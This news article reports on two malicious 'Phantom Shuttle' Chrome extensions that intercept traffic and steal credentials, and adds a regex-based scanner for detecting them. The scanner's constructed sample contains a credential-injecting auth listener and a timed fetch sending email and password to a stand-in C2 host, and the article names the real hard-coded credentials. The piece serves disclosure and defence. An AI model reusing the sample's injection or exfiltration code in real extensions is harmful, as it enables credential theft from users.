Two Chrome extensions discovered to be secretly stealing credentials from over 170 sites

December 24, 2025 6 Min Read

Cybersecurity researchers have discovered two malicious Google Chrome extensions with the same name and published by the same developer that have the ability to intercept traffic and capture user credentials.

The extensions are advertised as a “multi-location network speed test plugin” for developers and trade professionals. At the time of writing, both browser add-ons are still available for download. Here are the extension details:

  • Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj) – 2,000 users (released November 26, 2017)
  • Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd) – 180 users (released April 27, 2023)

“Users pay subscriptions ranging from 9.9 to 95.9 CNY ($1.40 to $13.50) believing they are purchasing a legitimate VPN service, but both variants perform the same malicious operations,” said Socket security researcher Kush Pandya.

“Behind the subscription facade, the extension performs full traffic interception through authentication credential injection, acts as a man-in-the-middle proxy, and continuously exfiltrates user data to the threat actor’s C2 (command and control) server.”

Once an unsuspecting user makes a payment, they receive VIP status and the extension automatically enables “smart” proxy mode, which routes traffic from over 170 targeted domains through the C2 infrastructure.

The extension works as advertised and reinforces the illusion of a functional product. It performs real latency tests on the proxy server and displays connection status while keeping users in the dark about its main purpose: intercepting network traffic and stealing credentials.

The malicious functionality lives in changes made to two JavaScript files bundled with the extension: jquery-1.12.2.min.js and scripts.js. This code registers a listener on chrome.webRequest.onAuthRequired so that hard-coded proxy credentials (topfany / 963852wei) are automatically injected into every HTTP authentication challenge, on every website.


“When a website or service requests HTTP authentication (basic, digest, or proxy authentication), this listener fires before the browser displays the credentials prompt,” Pandya explained. “It responds instantly with hard-coded proxy credentials, completely transparent to the user. The asyncBlocking mode ensures synchronous credential injection and prevents user interaction.”
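The traits just described (proxy and webRequest permissions, an onAuthRequired listener in asyncBlocking mode, a literal authCredentials object, a periodic beacon carrying a password) are all visible in an extension's unpacked files. The static triage scanner below is an added example, not Socket's tooling; the rule set, weights and the sample extension files are constructed here for illustration.

```javascript
// Added example: flag unpacked Chrome extension files that show the traits
// described above. Rules and weights are illustrative, not a vendor signature set.
const RULES = [
  { id: 'perm-proxy',      where: 'manifest', re: /"proxy"/, weight: 2 },
  { id: 'perm-webrequest', where: 'manifest', re: /"webRequest(?:AuthProvider|Blocking)?"/, weight: 1 },
  { id: 'auth-listener',   where: 'script',   re: /onAuthRequired\.addListener/, weight: 3 },
  // asyncBlocking / blocking lets the listener answer the challenge before any prompt appears
  { id: 'auth-blocking',   where: 'script',   re: /\[\s*['"](?:asyncBlocking|blocking)['"]\s*\]/, weight: 2 },
  // a password literal inside authCredentials is the hard-coded injection itself
  { id: 'auth-literal',    where: 'script',   re: /authCredentials\s*:\s*\{[^}]*password\s*:\s*['"]/, weight: 4 },
  { id: 'pac-script',      where: 'script',   re: /pacScript\s*:\s*\{|FindProxyForURL/, weight: 2 },
  // a timer that sends a "password=" parameter somewhere is the heartbeat pattern
  { id: 'cred-beacon',     where: 'script',   re: /setInterval[\s\S]{0,300}?(?:fetch|XMLHttpRequest|\.src\s*=)[\s\S]{0,200}?password=/, weight: 4 },
];

// files: { relativePath: fileContents } for one unpacked extension directory.
// Property names such as onAuthRequired survive minification, so bundled
// libraries (e.g. a modified jquery build) are scanned like any other script.
function scanExtension(files) {
  const hits = [];
  for (const [path, text] of Object.entries(files)) {
    const kind = path.endsWith('manifest.json') ? 'manifest' : path.endsWith('.js') ? 'script' : null;
    if (!kind) continue;
    for (const r of RULES) {
      if (r.where === kind && r.re.test(text)) hits.push({ rule: r.id, file: path, weight: r.weight });
    }
  }
  const score = hits.reduce((s, h) => s + h.weight, 0);
  const verdict = score >= 8 ? 'suspicious' : score > 0 ? 'review' : 'clean';
  return { score, verdict, hits };
}

// Constructed sample mirroring the behaviour described in the article; the
// credentials and hostnames are placeholders, not values from the real extension.
const SAMPLE_EXTENSION = {
  'manifest.json': '{"permissions":["proxy","webRequest","webRequestAuthProvider","<all_urls>"]}',
  'scripts.js': [
    'chrome.webRequest.onAuthRequired.addListener(function(d,cb){',
    '  cb({authCredentials:{username:"EXAMPLE_USER",password:"EXAMPLE_PASS"}});',
    '},{urls:["<all_urls>"]},["asyncBlocking"]);',
    'chrome.proxy.settings.set({value:{mode:"pac_script",pacScript:{data:PAC}}},function(){});',
    'setInterval(function(){fetch("https://c2.example.invalid/hb?email="+email+"&password="+pw)},300000);',
  ].join('\n'),
  'jquery-1.12.2.min.js': '/* minified library body omitted in this constructed sample */',
};

console.log(JSON.stringify(scanExtension(SAMPLE_EXTENSION), null, 2));
```

Point the function at the contents of a real unpacked extension (the directory Chrome keeps under its profile's Extensions folder) and review every hit by hand; the score only orders triage, it is not a verdict on its own.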

Once the user authenticates to the proxy server, the extension uses a proxy auto-configuration (PAC) script to configure Chrome’s proxy settings and implements three modes:

  • close: proxy functionality is disabled.
  • always: all web traffic is routed through the proxy.
  • smart: only a hard-coded list of over 170 high-value domains is routed through the proxy.

The list of domains includes developer platforms (GitHub, Stack Overflow, Docker), cloud services (Amazon Web Services, DigitalOcean, Microsoft Azure), enterprise vendors (Cisco, IBM, VMware), social media (Facebook, Instagram, Twitter), and adult content sites. Socket theorized that the inclusion of adult sites was likely intended to give the operators leverage to intimidate victims.

The end result of this behavior is that the user’s web traffic is routed through a proxy controlled by the threat actor, while the extension maintains a 60-second heartbeat to the C2 server at phantomshuttle(.)space, the domain the extension operates from. This gives the attacker a “man-in-the-middle” (MitM) position from which to capture traffic, manipulate responses, and inject arbitrary payloads.

More importantly, the heartbeat message sends the VIP user’s email, plaintext password, and version number via an HTTP GET request to an external server every 5 minutes for continuous credential extraction and session monitoring.

“The combination of heartbeat extraction (credentials and metadata) and proxy MitM (real-time traffic capture) provides comprehensive data theft capabilities that keep the extension active and running continuously,” Socket said.

In other words, when VIP mode is active the extension can capture passwords, credit card numbers, authentication cookies, browsing history, form data, API keys, and access tokens from users who access any of the targeted domains. Additionally, theft of sensitive developer information can pave the way for supply chain attacks.


It is currently unclear who is behind this eight-year operation, but the use of Chinese in the extension description, the presence of Alipay/WeChat Pay integration for payments, and the use of Alibaba Cloud as a host for the C2 domain indicate a China-based operation.

“Subscription models create victim retention while generating revenue, and professional infrastructure with payment integrations gives the appearance of legitimacy,” Socket said. “We believe that users are unknowingly purchasing VPN services with the ability to completely compromise their traffic.”

This finding highlights how browser extensions are becoming an unmanaged layer of risk for businesses. Users who have installed the extension are encouraged to remove it as soon as possible. Security teams should deploy extension allowlists, flag extensions that combine subscription payment systems with proxy permissions, and monitor the network for suspicious proxy authentication attempts.
